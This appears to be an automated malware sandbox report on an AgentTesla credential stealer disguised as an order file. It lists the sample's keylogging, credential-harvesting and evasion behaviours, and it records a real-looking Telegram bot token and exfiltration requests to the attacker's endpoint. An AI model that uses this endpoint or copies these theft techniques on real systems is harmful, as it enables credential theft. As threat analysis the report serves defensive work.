Windows Analysis Report
ORDER (6256 OS)#391 PI.exe

Overview

General Information

Sample Name: ORDER (6256 OS)#391 PI.exe
Analysis ID: 764027
MD5: 19081ef2a08f678a3203b29124043c41
SHA1: e86acea06a600f170402a0c1020c25ac2550ffa0
SHA256: 2f356283c209400c6385a24450f266b59477e035e9389c8d1af4843cd1ad2374
Tags: agentteslaexe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected AntiVM3
Sigma detected: Scheduled temp file as task from temp location
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Contains functionality to register a low level keyboard hook
Machine Learning detection for sample
May check the online IP address of the machine
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Uses a known web browser user agent for HTTP communication
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection

Source: ORDER (6256 OS)#391 PI.exe ReversingLabs: Detection: 30%
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe ReversingLabs: Detection: 30%
Source: ORDER (6256 OS)#391 PI.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Joe Sandbox ML: detected
Source: 0.2.ORDER (6256 OS)#391 PI.exe.40a16e0.1.raw.unpack Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5962712783:AAFVWYP7zptQlynX_9COtuxYcx3Dl7EnfUQ/sendMessage?chat_id=1644584536"}
Source: WsdnBq.exe.1328.8.memstrmin Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5962712783:AAFVWYP7zptQlynX_9COtuxYcx3Dl7EnfUQ/sendMessage"}
Source: ORDER (6256 OS)#391 PI.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 3.232.242.170:443 -> 192.168.2.4:49695 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49696 version: TLS 1.2
Source: unknown HTTPS traffic detected: 54.91.59.199:443 -> 192.168.2.4:49697 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49698 version: TLS 1.2
Source: ORDER (6256 OS)#391 PI.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: RycGBA2.pdb source: ORDER (6256 OS)#391 PI.exe, WsdnBq.exe.0.dr
Source: Binary string: RycGBA2.pdbSHA256 source: ORDER (6256 OS)#391 PI.exe, WsdnBq.exe.0.dr
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 0_2_0F2E0D18
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 0_2_0F2E0D08
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 0_2_0F2E0DD3
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 5_2_0E820B98
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 5_2_0E820B88

Networking

Source: Traffic Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49696 -> 149.154.167.220:443
Source: Traffic Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49698 -> 149.154.167.220:443
Source: unknown DNS query: name: api.telegram.org
Source: unknown DNS query: name: api.telegram.org
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe DNS query: name: api.ipify.org
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic HTTP traffic detected: POST /bot5962712783:AAFVWYP7zptQlynX_9COtuxYcx3Dl7EnfUQ/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dad9d3fba18902Host: api.telegram.orgContent-Length: 1079Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5962712783:AAFVWYP7zptQlynX_9COtuxYcx3Dl7EnfUQ/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dad9d46448f6a9Host: api.telegram.orgContent-Length: 1079Expect: 100-continueConnection: Keep-Alive
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 54.91.59.199 54.91.59.199
Source: Joe Sandbox View IP Address: 54.91.59.199 54.91.59.199
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: unknown Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49697 -> 443
Source: WsdnBq.exe, 00000008.00000002.565696055.0000000003271000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: ORDER (6256 OS)#391 PI.exe, 00000004.00000002.567037453.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000008.00000002.566476117.00000000032DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: WsdnBq.exe, 00000008.00000003.450250389.00000000015E6000.00000004.00000020.00020000.00000000.sdmp, WsdnBq.exe, 00000008.00000003.535612424.00000000015F6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://fontfabrik.com
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.338224910.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000004.00000002.565396808.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000005.00000002.398697821.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000008.00000002.565696055.0000000003271000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301689714.0000000005F13000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.307345140.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304196469.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304651333.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304139159.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305855891.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306476107.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304491242.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303482107.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305929932.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304437139.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.307312499.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304413252.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306400487.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303216869.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303104333.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306139248.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304750887.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304466931.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305354155.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303996945.0000000005F13000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303155186.0000000005F13000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.ascendercorp.com/typedesigners.html
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301936890.0000000005ED3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.comigXje
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304178747.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304733777.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304498697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305110962.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304711949.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304659358.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304523813.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305041614.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305148691.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304920069.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304553639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304203849.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304474473.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304869319.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304627606.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304419984.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304682884.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304443149.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304733777.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305041614.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304920069.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304869319.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305302404.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304887480.0000000005F1D000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304203849.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304228747.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com9
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306418196.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306179537.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305459409.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306112026.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305947057.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305872051.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306630165.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305405967.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305688249.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305902033.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305793816.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306146868.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306356978.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306084469.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305838697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306295180.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305649023.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306583635.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305517979.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comF
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306418196.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306179537.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306112026.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305947057.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306146868.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306356978.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306084469.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306295180.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comF.
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306418196.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306179537.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306112026.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305947057.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305872051.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305902033.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306146868.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306356978.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306084469.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306295180.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comFQO
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306418196.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306179537.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305459409.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306112026.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305947057.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305334059.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305363596.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305872051.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306630165.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305405967.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305302404.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305688249.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305902033.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305793816.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306146868.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306356978.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306084469.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305838697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306295180.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305649023.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306583635.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comK
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304733777.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304498697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305110962.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304711949.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304659358.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304523813.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305041614.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305148691.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304920069.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304553639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305302404.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305217303.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304474473.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304869319.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304627606.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304682884.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304443149.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305176599.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305196320.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comR.TTF
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304733777.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305041614.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304920069.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304869319.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comT.TTF
